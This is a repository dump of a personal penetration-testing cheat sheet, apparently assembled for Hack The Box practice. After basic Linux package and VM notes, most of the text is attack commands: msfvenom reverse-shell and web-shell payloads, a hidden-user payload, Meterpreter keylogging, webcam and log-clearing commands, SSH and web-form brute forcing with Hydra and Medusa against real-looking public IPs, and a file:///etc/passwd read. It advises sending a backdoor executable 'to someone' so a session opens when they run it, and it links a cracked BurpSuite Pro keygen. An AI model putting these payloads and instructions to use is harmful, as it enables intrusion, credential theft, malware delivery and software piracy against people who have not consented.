├── LinuxCheatSheet ├── README.md ├── cewl └── wireshark /LinuxCheatSheet: -------------------------------------------------------------------------------- 1 | How to update/upgrade Linux: 2 | What does APT do? 3 | 4 | APT (Advanced Packaging Tool) is a set of core tools found inside the Debian operating system. It provides utilities for the installation and removal of software packages and dependencies on a system. 5 | 6 | apt is a subset of apt-get and apt-cache commands providing necessary commands for package management. 7 | while apt-get won’t be deprecated, as a regular user, you should start using apt more often. 8 | 9 | sudo apt install 10 | Installs a package 11 | 12 | sudo apt remove 13 | Removes a package 14 | 15 | sudo apt purge 16 | Removes package with configuration 17 | 18 | sudo apt update 19 | Refreshes repository index 20 | 21 | sudo apt upgrade 22 | Upgrades all upgradable packages 23 | 24 | sudo apt autoremove 25 | Removes unwanted packages 26 | 27 | sudo apt full-upgrade 28 | Upgrades packages with auto-handling of dependencies 29 | 30 | sudo apt search 31 | Searches for a program 32 | 33 | sudo apt show 34 | Shows package details 35 | 36 | sudo apt list 37 | Lists packages with criteria (installed, upgradable etc) 38 | 39 | sudo apt edit-sources 40 | edits sources list 41 | 42 | sudo apt clean 43 | The clean command clears out the local repository of downloaded package files. It removes everything except the partials folder and lock file from /var/cache/apt/archives/. Use apt clean to free up disk space when necessary, or as part of regularly scheduled maintenance. 44 | 45 | sudo apt autoclean 46 | autoclean is another method used to clear out the local repository of downloaded package files, just like clean. The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources, and are very likely to be useless. 47 | 48 | sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y 49 | =========================================================================================================================== 50 | First things to do after installing Linux: 51 | 1. Download and Install Latest Updates 52 | sudo apt update && sudo apt upgrade 53 | 2. Install GNOME Tweak Tool 54 | sudo apt install gnome-tweak-tool 55 | 3. Install Git 56 | sudo apt install git 57 | 4. Install PIP 58 | sudo apt install python3-pip 59 | 5. Install GNOME Extensions 60 | Just go to https://extensions.gnome.org/ to download and install your preferred extensions. 61 | 6. Play with Different Desktop Environment 62 | To try MATE, run following command in Terminal. 63 | sudo apt install Ubuntu-mate-desktop 64 | 65 | To try Cinnamon, run following command in Terminal. 66 | sudo apt-get install cinnamon-desktop-environment 67 | 68 | To try KDE, run following command in Terminal. 69 | sudo apt-get install kde-standard 70 | 71 | 72 | 73 | =========================================================================================================================== 74 | How to install a dpkg: 75 | 76 | dpkg is a tool for installing, removing, and querying individual packages. 77 | 78 | dpkg -i ~/Downloads/file.deb 79 | =========================================================================================================================== 80 | How to fix HTB openvpn connection issue: 81 | # vim /etc/sysctl.conf 82 | 83 | Set following to 0: 84 | net.ipv6.conf.all.disable_ipv6 = 0 85 | net.ipv6.conf.default.disable_ipv6 = 0 86 | net.ipv6.conf.lo.disable_ipv6 = 0 87 | =========================================================================================================================== 88 | Virtual Machine Network Types: 89 | 90 | Bridge mode: 91 | This connects the virtual network adapter directly to the physical network 92 | 93 | NAT: 94 | This allows the virtual network adapter to share the host’s IP address 95 | 96 | Host Only: 97 | This creates a private network that the virtual network adapter shares with the host 98 | 99 | Custom: 100 | This allows you to create your own virtual network 101 | =========================================================================================================================== 102 | Free BurpSuite Pro installation: 103 | https://ftuapps.dev/burp-suite-professional-edition-v2-0-11-full-all-addons-keygen/ 104 | 1. Download and Extract 105 | 2. Run 'BurpSuite Loader & Keygen' 106 | 3. Press 'run' in upper right hand corner and Burpsuite will load 107 | =========================================================================================================================== 108 | 109 | =========================================================================================================================== 110 | How to uncompress with tar: 111 | 112 | -x = extract 113 | -z = gzipped archive 114 | -f = get from a file (must be the last command) 115 | 116 | 'sudo tar -xzf utorrent-server-3.0-ubuntu-10.10-27079.tar.gz' 117 | =========================================================================================================================== 118 | Routersploit: 119 | 120 | Install: 121 | sudo apt-get install python-dev python-pip libncurses5-dev git 122 | git clone https://github.com/reverse-shell/routersploit 123 | cd routersploit 124 | pip install -r requirements.txt 125 | ./rsf.py 126 | 127 | 1. Exploits, Pick the module(Press Tab Twice to Complete Module): 128 | exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ 129 | 130 | rsf > use exploits/dlink/dir_300_600_rce 131 | 132 | 2. Creds: 133 | Modules located under creds/ directory allow running dictionary attacks against various network services. 134 | Following services are currently supported: 135 | 136 | ftp 137 | ssh 138 | telnet 139 | http basic auth 140 | http form auth 141 | snmp 142 | 143 | rsf > use creds/ 144 | creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default 145 | creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce 146 | rsf > use creds/ssh_default 147 | rsf (SSH Default Creds) > 148 | 149 | =========================================================================================================================== 150 | CrackMapExec 151 | 152 | CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. 153 | 154 | CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques. 155 | 156 | Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. 157 | 158 | "crackmapexec smb " 159 | "crackmapexec smb --pass-pol 160 | enumerates password policy 161 | "crackmapexec smb --shares -u -p 162 | =========================================================================================================================== 163 | SmbClient: 164 | smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. 165 | smbclient -L // 166 | enumerate shares(users) on a server 167 | smbclient /// 168 | 169 | Mount to host OS instead of using smbclient: 170 | sudo mkdir /mnt/user 171 | sudo mount -t cifs /// /mnt/ 172 | sudo mount -t //10.10.10.178/Data /mnt/Data 173 | find . -ls -type f 174 | shows files 175 | 176 | =========================================================================================================================== 177 | SmbMap: 178 | SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. 179 | 180 | "smbmap -H " 181 | =========================================================================================================================== 182 | Nmap: 183 | Top 13 Nmap command examples: 184 | 185 | 1. Basic Nmap Scan against IP or host 186 | "nmap 1.1.1.1" 187 | 188 | Now, if you want to scan a hostname, simply replace the IP for the host: 189 | "nmap cloudflare.com" 190 | 191 | These kinds of basic scans are perfect for your first steps when starting with Nmap. 192 | 2. Scan specific ports or scan entire port ranges on a local or remote server 193 | nmap -p 1-65535 localhost 194 | 195 | Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below: 196 | nmap -p 80,443 8.8.8.8 197 | 198 | 3. Scan multiple IP addresses 199 | nmap 1.1.1.1 8.8.8.8 200 | 201 | You can also scan consecutive IP addresses: 202 | nmap -p 1.1.1.1,2,3,4 203 | This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4. 204 | 205 | 4. Scan IP ranges 206 | nmap -p 8.8.8.0/28 207 | 208 | This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14. 209 | An alternative is to simply use this kind of range: 210 | nmap 8.8.8.1-14 211 | 212 | You can even use wildcards to scan the entire C class IP range, for example: 213 | nmap 8.8.8.* 214 | This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256. 215 | 216 | If you ever need to exclude certain IPs from the IP range scan, you can use the “–exclude” option, as you see below: 217 | nmap -p 8.8.8.* --exclude 8.8.8.1 218 | 5. Scan the most popular ports 219 | 220 | Using “–top-ports” parameter along with a specific number lets you scan the top X most common ports for that host. 221 | "nmap --top-ports 20 192.168.1.106" 222 | Replace “20” with the desired number. 223 | 224 | 6. Scan hosts and IP addresses reading from a text file: 225 | Let’s suppose you create a list.txt file that contains these lines inside: 226 | 192.168.1.106 227 | cloudflare.com 228 | microsoft.com 229 | securitytrails.com 230 | The “-iL” parameter lets you read from that file, and scan all those hosts for you: 231 | "nmap -iL list.txt" 232 | 233 | 7. Save your Nmap scan results to a file 234 | "nmap -oN output.txt securitytrails.com" 235 | 236 | 8. Disabling DNS name resolution 237 | If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “-n” parameter. 238 | "nmap -p 80 -n 8.8.8.8" 239 | 240 | 9. Scan + OS and service detection with fast execution: 241 | Using the “-A” parameter enables you to perform OS and service detection, and at the same time we are combining this with “-T4” for faster execution. 242 | "nmap -A -T4 cloudflare.com" 243 | 244 | 10. Detect service/daemon versions: 245 | This can be done by using -sV parameters 246 | "nmap -sV localhost" 247 | 248 | 11. CVE detection using Nmap: 249 | One of Nmap’s greatest features. If you want to run a full vulnerability test against your target, you can use these parameters: 250 | "nmap -Pn --script vuln 192.168.1.105" 251 | 252 | 12: FTP brute force attack: 253 | "nmap --script ftp-brute -p 21 192.168.1.105" 254 | 255 | 13: Scan for MySQL on port 3306 256 | "nmap 10.10.10.50 -p 3306" 257 | 258 | 259 | 260 | 261 | ========================================================================================================= 262 | How to look up IP Address for a website: 263 | 264 | nslookup www.whateversite.com 265 | ========================================================================================================= 266 | How to pull a file using Burpsuite: 267 | 268 | in a Repeater tab, at the bottom of the request header type: 269 | 'url=file:///etc/passwd' 270 | ========================================================================================================= 271 | #Gobuster: 272 | Common Command line options 273 | 274 | -fw – force processing of a domain with wildcard results. 275 | -np – hide the progress output. 276 | -m – which mode to use, either dir or dns (default: dir). 277 | -q – disables banner/underline output. 278 | -t 279 | – number of threads to run (default: 10). 280 | -u – full URL (including scheme), or base domain name. 281 | -v – verbose output (show all results). 282 | -w – path to the wordlist used for brute forcing (use – for stdin). 283 | 284 | Command line options for dns mode 285 | 286 | -cn – show CNAME records (cannot be used with ‘-i’ option). 287 | -i – show all IP addresses for the result. 288 | 289 | Command line options for dir mode 290 | 291 | -a – specify a user agent string to send in the request header. 292 | -c – use this to specify any cookies that you might need (simulating auth). 293 | -e – specify extended mode that renders the full URL. 294 | -f – append / for directory brute forces. 295 | -k – Skip verification of SSL certificates. 296 | -l – show the length of the response. 297 | -n – “no status” mode, disables the output of the result’s status code. 298 | -o – specify a file name to write the output to. 299 | -p – specify a proxy to use for all requests (scheme much match the URL scheme). 300 | -r – follow redirects. 301 | -s – comma-separated set of the list of status codes to be deemed a “positive” (default: 200,204,301,302,307). 302 | -x – list of extensions to check for, if any. 303 | -P – HTTP Authorization password (Basic Auth only, prompted if missing). 304 | -U – HTTP Authorization username (Basic Auth only). 305 | -to – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s). 306 | "gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u https://10.10.10.84" 307 | 308 | gobuster vhost -w /opt/SecLists/Discovery/DNS/subdomains-top1million.txt -u http://forwardslash.htb 309 | =========================================================================================================================== 310 | Nikto: 311 | 312 | It enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetration testing. 313 | 314 | perl nikto.pl -host 209.17.116.7 -useragent bob 315 | =========================================================================================================================== 316 | 317 | 318 | #Wfuzz: 319 | 320 | Wfuzz can be used to look for hidden content, such as files and directories, within a web server, allowing to find further attack vectors. It is worth noting that, the success of this task depends highly on the dictionaries used. 321 | 322 | Wfuzz looking for common directories: 323 | "wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ" 324 | 325 | Wfuzz looking for common files: 326 | "wfuzz -w wordlist/general/common.txt /FUZZ.php" 327 | 328 | You often want to fuzz some sort of data in the URL’s query string, this can be achieved by specifying the FUZZ keyword in the URL after a question mark: 329 | "wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ" 330 | =========================================================================================================================== 331 | Setting up Metasploit: 332 | systemctl start postgresql 333 | msfdb init 334 | db_status 335 | 336 | Metasploit Pro: 337 | https://localhost:3790/ 338 | =========================================================================================================================== 339 | Meterpreter Commands: 340 | 341 | Core Commands 342 | ============= 343 | 344 | Command Description 345 | ------- ----------- 346 | ? Help menu 347 | background Backgrounds the current session 348 | bg Alias for background 349 | bgkill Kills a background meterpreter script 350 | bglist Lists running background scripts 351 | bgrun Executes a meterpreter script as a background thread 352 | channel Displays information or control active channels 353 | close Closes a channel 354 | disable_unicode_encoding Disables encoding of unicode strings 355 | enable_unicode_encoding Enables encoding of unicode strings 356 | exit Terminate the meterpreter session 357 | get_timeouts Get the current session timeout values 358 | guid Get the session GUID 359 | help Help menu 360 | info Displays information about a Post module 361 | irb Open an interactive Ruby shell on the current session 362 | load Load one or more meterpreter extensions 363 | machine_id Get the MSF ID of the machine attached to the session 364 | migrate Migrate the server to another process 365 | pivot Manage pivot listeners 366 | pry Open the Pry debugger on the current session 367 | quit Terminate the meterpreter session 368 | read Reads data from a channel 369 | resource Run the commands stored in a file 370 | run Executes a meterpreter script or Post module 371 | secure (Re)Negotiate TLV packet encryption on the session 372 | sessions Quickly switch to another session 373 | set_timeouts Set the current session timeout values 374 | sleep Force Meterpreter to go quiet, then re-establish session. 375 | transport Change the current transport mechanism 376 | use Deprecated alias for "load" 377 | uuid Get the UUID for the current session 378 | write Writes data to a channel 379 | 380 | 381 | Stdapi: File system Commands 382 | ============================ 383 | 384 | Command Description 385 | ------- ----------- 386 | cat Read the contents of a file to the screen 387 | cd Change directory 388 | checksum Retrieve the checksum of a file 389 | cp Copy source to destination 390 | dir List files (alias for ls) 391 | download Download a file or directory 392 | edit Edit a file 393 | getlwd Print local working directory 394 | getwd Print working directory 395 | lcd Change local working directory 396 | lls List local files 397 | lpwd Print local working directory 398 | ls List files 399 | mkdir Make directory 400 | mv Move source to destination 401 | pwd Print working directory 402 | rm Delete the specified file 403 | rmdir Remove directory 404 | search Search for files 405 | show_mount List all mount points/logical drives 406 | upload Upload a file or directory 407 | 408 | 409 | Stdapi: Networking Commands 410 | =========================== 411 | 412 | Command Description 413 | ------- ----------- 414 | arp Display the host ARP cache 415 | getproxy Display the current proxy configuration 416 | ifconfig Display interfaces 417 | ipconfig Display interfaces 418 | netstat Display the network connections 419 | portfwd Forward a local port to a remote service 420 | resolve Resolve a set of host names on the target 421 | route View and modify the routing table 422 | 423 | 424 | Stdapi: User interface Commands 425 | 426 | Command Description 427 | ------- ----------- 428 | enumdesktops List all accessible desktops and window stations 429 | getdesktop Get the current meterpreter desktop 430 | idletime Returns the number of seconds the remote user has been idle 431 | keyboard_send Send keystrokes 432 | keyevent Send key events 433 | keyscan_dump Dump the keystroke buffer 434 | keyscan_start Start capturing keystrokes 435 | keyscan_stop Stop capturing keystrokes 436 | mouse Send mouse events 437 | screenshare Watch the remote user's desktop in real time 438 | screenshot Grab a screenshot of the interactive desktop 439 | setdesktop Change the meterpreters current desktop 440 | uictl Control some of the user interface components 441 | 442 | Stdapi: System Commands 443 | ======================= 444 | 445 | Command Description 446 | ------- ----------- 447 | clearev Clear the event log 448 | drop_token Relinquishes any active impersonation token. 449 | execute Execute a command 450 | getenv Get one or more environment variable values 451 | getpid Get the current process identifier 452 | getprivs Attempt to enable all privileges available to the current process 453 | getsid Get the SID of the user that the server is running as 454 | getuid Get the user that the server is running as 455 | kill Terminate a process 456 | localtime Displays the target system's local date and time 457 | pgrep Filter processes by name 458 | pkill Terminate processes by name 459 | ps List running processes 460 | reboot Reboots the remote computer 461 | reg Modify and interact with the remote registry 462 | rev2self Calls RevertToSelf() on the remote machine 463 | shell Drop into a system command shell 464 | shutdown Shuts down the remote computer 465 | steal_token Attempts to steal an impersonation token from the target process 466 | suspend Suspends or resumes a list of processes 467 | sysinfo Gets information about the remote system, such as OS 468 | 469 | 470 | Stdapi: Webcam Commands 471 | ======================= 472 | 473 | Command Description 474 | ------- ----------- 475 | record_mic Record audio from the default microphone for X seconds 476 | webcam_chat Start a video chat 477 | webcam_list List webcams 478 | webcam_snap Take a snapshot from the specified webcam 479 | webcam_stream Play a video stream from the specified webcam 480 | 481 | 482 | Stdapi: Audio Output Commands 483 | ============================= 484 | 485 | Command Description 486 | ------- ----------- 487 | play play a waveform audio file (.wav) on the target system 488 | 489 | Priv: Elevate Commands 490 | ====================== 491 | 492 | Command Description 493 | ------- ----------- 494 | getsystem Attempt to elevate your privilege to that of local system. 495 | 496 | 497 | Priv: Password database Commands 498 | ================================ 499 | 500 | Command Description 501 | ------- ----------- 502 | hashdump Dumps the contents of the SAM database 503 | 504 | 505 | Priv: Timestomp Commands 506 | ======================== 507 | 508 | Command Description 509 | ------- ----------- 510 | timestomp Manipulate file MACE attributes 511 | 512 | Creating an executable backdoor with Metasploit: 513 | "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 LPORT=4444 -f exe -o payload.exe" 514 | The backdoor.exe file is saved in the path where you executed the command. Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start 515 | 516 | LHOST= Your IP 517 | RHOST= Target IP 518 | 519 | List payloads: 520 | "msfvenom -l" 521 | 522 | Linux Meterpreter Reverse Shell: 523 | "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf" 524 | 525 | Linux Bind Meterpreter Shell: 526 | "msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT= -f elf > bind.elf" 527 | 528 | Linux Bind Shell: 529 | "msfvenom -p generic/shell_bind_tcp RHOST= LPORT= -f elf > term.elf" 530 | 531 | Windows Meterpreter Reverse TCP Shell: 532 | "msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe" 533 | 534 | Windows Reverse TCP Shell: 535 | "msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe" 536 | 537 | Windows Encoded Meterpreter Windows Reverse Shell: 538 | "msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe" 539 | 540 | Mac Reverse Shell: 541 | "msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho" 542 | 543 | Mac Bind Shell: 544 | "msfvenom -p osx/x86/shell_bind_tcp RHOST= LPORT= -f macho > bind.macho" 545 | 546 | Web Payloads: 547 | 548 | PHP Meterpreter Reverse TCP 549 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 550 | cat shell.php | pbcopy && echo ‘ shell.php && pbpaste >> shell.php 551 | 552 | ASP Meterpreter Reverse TCP 553 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 554 | 555 | JSP Java Meterpreter Reverse TCP 556 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 557 | 558 | WAR 559 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 560 | 561 | Scripting Payloads 562 | 563 | Python Reverse Shell 564 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 565 | 566 | Bash Unix Reverse Shell 567 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 568 | 569 | Perl Unix Reverse shell 570 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 571 | 572 | Shellcode 573 | 574 | Windows Meterpreter Reverse TCP Shellcode 575 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 576 | 577 | Linux Meterpreter Reverse TCP Shellcode 578 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 579 | 580 | Mac Reverse TCP Shellcode 581 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 582 | 583 | Create User 584 | msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe 585 | 586 | Metasploit Handler: 587 | 588 | use exploit/multi/handler 589 | set PAYLOAD 590 | Set RHOST 591 | set LHOST 592 | set LPORT 593 | Run 594 | 595 | msf> use multi/handler 596 | msf exploit(handler) > set RHOST 597 | msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 598 | msf exploit(handler) > set LHOST 599 | msf exploit(handler) > set LPORT 600 | msf exploit(handler) > exploit 601 | [*] Started reverse handler on 192.168.75.35:4444 602 | [*] Starting the payload handler… 603 | 604 | SSH User Enumeration in Metasploit: 605 | AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 606 | >set RHOSTS 607 | >set USERNAME admin 608 | >run 609 | 610 | =========================================================================================================================== 611 | Netcat: 612 | 613 | Basic Chat Server: 614 | On Your first machine type: 615 | "nc -l 2222" 616 | This will simply listen on port 2222 for any incoming data. On another machine run: 617 | "nc 192.168.0.31 2222" 618 | Next, type anything at all such e.g. "hello world!" and you'll see it echo'd on the listener's shell. Any text entered into either of the shells ends up being displayed on the other machine also. 619 | 620 | File transfer - from the server side (listener): 621 | 622 | we'll transfer a file from one box (the server) to another box (the client). So as soon as the server receives a connection, the file gets transferred. On the machine where the file exists run the following command: 623 | "nc -l 2222 < filename >" 624 | 625 | On the box where you'd like to receive the file, run: 626 | 627 | "nc 192.168.0.31 2222 > any_file_name" 628 | 629 | Note that if you don't point the data to any_filename, the data will just be displayed in the shell at the receiving end. Also, obviously the receiving file any_file_name can be any file name (but is normally the same as the original). 630 | 631 | If you wanted to append the contents of filename to an already existing any_filename, you could use this instead: 632 | 633 | "nc 192.168.0.31 2222 >> any_file_name" 634 | 635 | Note the '>>' rather than just a single '>' (the '>>' appends while the > replaces). 636 | File transfer - from the client side 637 | 638 | To transfer a file in the opposite direction use: 639 | 640 | "nc -l 2222 > file_copy" 641 | 642 | On the client side (sender in this case) use: 643 | 644 | "cat file_to_send | nc 192.168.0.31 2222" 645 | 646 | To keep the listening open for further data, use the the -k option: 647 | 648 | "nc -lk 2222 >> file" 649 | 650 | =========================================================================================================================== 651 | Python server for when you want to transfer a file 652 | sudo python3 -m http.server 80 653 | =========================================================================================================================== 654 | Crunch Wordlist: 655 | crunch 4 4 012345abcdef -o Documents/pass.txt 656 | =========================================================================================================================== 657 | Hydra: 658 | Install hydra with the following commands: 659 | $ git clone https://github.com/vanhauser-thc/thc-hydra.git 660 | $ cd thc-hydra/ 661 | $ ./configure 662 | $ make 663 | $ make install 664 | 665 | hydra -l admin -P /home/kali/htb/nineveh/10k 10.10.10.43 http-post-form "/department/login.php:username=^user^&password=^PASS^:Invalid" -t 64 666 | 667 | hydra -l root -p admin 69.167.51.201 -t 4 ssh 668 | 669 | hydra -l root -P /usr/share/wordlists/metasploit/piata_ssh_userpass.txt 69.167.51.201 -t 4 670 | 671 | =========================================================================================================================== 672 | Medusa: 673 | "medusa -h 192.168.1.1 -u "admin" -P hugewordlist.txt -M http" 674 | 675 | -h [TARGET] 676 | Target hostname or IP address. 677 | 678 | -H [FILE] 679 | Reads target specifications from the file specified rather than from the command line. The file should contain a list separated by newlines. 680 | 681 | -u [TARGET] 682 | Target username. 683 | 684 | -U [FILE] 685 | Reads target usernames from the file specified rather than from the command line. The file should contain a list separated by newlines. 686 | 687 | -p [TARGET] 688 | Target password. 689 | 690 | -P [FILE] 691 | Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines. 692 | 693 | -C [FILE] 694 | File containing combo entries. Combo files are colon separated and in the following format: host:user:password. If any of the three fields are left empty, the respective information should be provided either as a single global value or as a list in a file. 695 | 696 | -O [FILE] 697 | File to append log information to. Medusa will log all accounts credentials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parameters. 698 | 699 | -e [n/s/ns] 700 | Additional password checks ([n] No Password, [s] Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s". 701 | 702 | -M [TEXT] 703 | Name of the module to execute (without the .mod extension). 704 | 705 | -m [TEXT] 706 | Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.) 707 | 708 | -d 709 | Dump all known modules. 710 | 711 | -n [NUM] 712 | Use for non-default TCP port number. 713 | 714 | -s 715 | Enable SSL. 716 | 717 | -g [NUM] 718 | Give up after trying to connect for NUM seconds (default 3). 719 | 720 | -r [NUM] 721 | Sleep NUM seconds between retry attempts (default 3). 722 | 723 | -R [NUM] 724 | Attempt NUM retries before giving up. The total number of attempts will be NUM + 1. 725 | 726 | 727 | -t [NUM] 728 | Total number of logins to be tested concurrently. It should be noted that rougly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host. 729 | 730 | -T [NUM] 731 | Total number of hosts to be tested concurrently. 732 | 733 | -L 734 | Parallelize logins using one username per thread. The default is to process the entire username before proceeding. 735 | 736 | -f 737 | Stop scanning host after first valid username/password found. 738 | 739 | -F 740 | Stop audit after first valid username/password found on any host. 741 | 742 | -b 743 | Suppress startup banner 744 | 745 | -q 746 | Display module's usage information. This should be used in conjunction with the "-M" option. For example, "medusa -M smbnt -q". 747 | 748 | -v [NUM] 749 | Verbose level [0 - 6 (more)]. All messages at or below the specified level will be displayed. The default level is 5. 750 | 751 | -w [NUM] 752 | Error debug level [0 - 10 (more)]. All messages at or below the specified level will be displayed. The default level is 5. 753 | 754 | -V 755 | Display version 756 | 757 | Available Medusa Modules: 758 | 759 | afp.mod : Brute force module for AFP sessions 760 | cvs.mod : Brute force module for CVS sessions 761 | ftp.mod : Brute force module for FTP/FTPS sessions 762 | http.mod : Brute force module for HTTP 763 | imap.mod : Brute force module for IMAP sessions 764 | mssql.mod : Brute force module for MSSQL sessions 765 | mysql.mod : Brute force module for MySQL sessions 766 | nntp.mod : Brute force module for NNTP sessions 767 | pcanywhere.mod : Brute force module for PcAnywhere sessions 768 | pop3.mod : Brute force module for POP3 sessions 769 | postgres.mod : Brute force module for PostgreSQL sessions 770 | rdp.mod : Brute force module for RDP (Microsoft Terminal Server) sessions 771 | rexec.mod : Brute force module for REXEC sessions 772 | rlogin.mod : Brute force module for RLOGIN sessions 773 | rsh.mod : Brute force module for RSH sessions 774 | smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions 775 | smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) 776 | smtp.mod : Brute force module for SMTP Authentication with TLS 777 | snmp.mod : Brute force module for SNMP Community Strings 778 | ssh.mod : Brute force module for SSH v2 sessions 779 | svn.mod : Brute force module for Subversion sessions 780 | telnet.mod : Brute force module for telnet sessions 781 | vmauthd.mod : Brute force module for the VMware Authentication Daemon 782 | vnc.mod : Brute force module for VNC sessions 783 | web-form.mod : Brute force module for web form 784 | wrapper.mod : Generic Wrapper Module 785 | 786 | =========================================================================================================================== 787 | SQLmap: 788 | sqlmap -r search.req --batch --force-ssl 789 | sqlmap -r login.req --batch --force-ssl461 790 | -'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File' 791 | -'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File' 792 | =========================================================================================================================== 793 | How to set a WiFi adapter in Monitor Mode: 794 | ifconfig wlan0 down 795 | iwconfig wlan0 mode monitor 796 | ifconfig wlan0 up 797 | 798 | or 799 | 800 | airmon-ng check kill 801 | airmon-ng start wlan0 802 | =========================================================================================================================== 803 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LinuxCheatSheet 2 | 3 | 4 | Topics include (not in order):
5 | Updating/upgrading Kali Linux
6 | installing PIP & Git
7 | Virtual Machine Network Types
8 | How to install a dpkg file
9 | Nmap
10 | crackmapexec
11 | mslookup
12 | Smbclient
13 | Smbmap
14 | Metasploit
15 | Meterpreter commands
16 | Msfvenom
17 | Wfuzz
18 | Gobuster
19 | Netcat
20 | How to start a Python server
21 | Crunch
22 | Hydra
23 | SQLmap
24 | How to put a Network adapter in monitor-mode
25 | How to fix common Hack The Box VPN connection issue
26 | Wireshark Filters
27 | -------------------------------------------------------------------------------- /cewl: -------------------------------------------------------------------------------- 1 | Default Method: 2 | Enter the following command which spiders the given URL to a specified depth and prints a list of words which can then be used as a dictionary for cracking the password. 3 | cewl http://www.randomsite.com 4 | 5 | To save it to a wordlist: 6 | '-w file.txt' 7 | cewl http://www.randomsite.com -w wordlist.txt 8 | 9 | To see your wordlist: 10 | cat wordlist.txt (or whatever you named it) 11 | 12 | Generating Wordlist of Specific Length: 13 | '-m 9' 14 | cewl https://randomsite.com -m 9 15 | The above command will generate a list of minimum 9 words. 16 | 17 | Retrieving Emails from a Website: 18 | -e option enables email parameter 19 | -n option hides the list of the word generated while crawling the given website. 20 | cewl https://randomsite.com -n -e 21 | 22 | Count the number of Word Repeated in a website: 23 | -c option enables count parameter. 24 | cewl https://randomsite.com -c 25 | 26 | Increase the Depth to Spider: 27 | If you want to increase the level of spider for generating a larger list of the word by enumerating more new words from the website then use -d option along with depth level number that enables depth parameter for making more intense creeping. By Default it the depth level set is 2. 28 | cewl https://randomsite.com -d 2 29 | 30 | Extra Debug Information 31 | use -–debug option to enable debug mode and show errors and raw details of a website while crawling. 32 | cewl https://randomsite.com --debug 33 | 34 | Verbose Mode: 35 | To expand the website crawling result and for retrieving completed detail of a website, you can use -v option for verbose mode. Rather than generating wordlist, it will dump the information available on the website. 36 | cewl https://randomsite.com -v 37 | 38 | Generating Alpha-Numeric 39 | If you want to generate an alpha-numeric wordlist then you can use –with-numbers option along with the command. 40 | cewl http://randomsite.com --with-numbers 41 | 42 | Cewl with Digest/Basic Authentication: 43 | If there is page authentication for login into the website then above default will not work properly, in order to generate a wordlist you need to bypass the authentication page by using the following parameter: 44 | –auth_type: Digest or basic. 45 | –auth_user: Authentication username. 46 | –auth_pass: Authentication password. 47 | cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v 48 | cewl 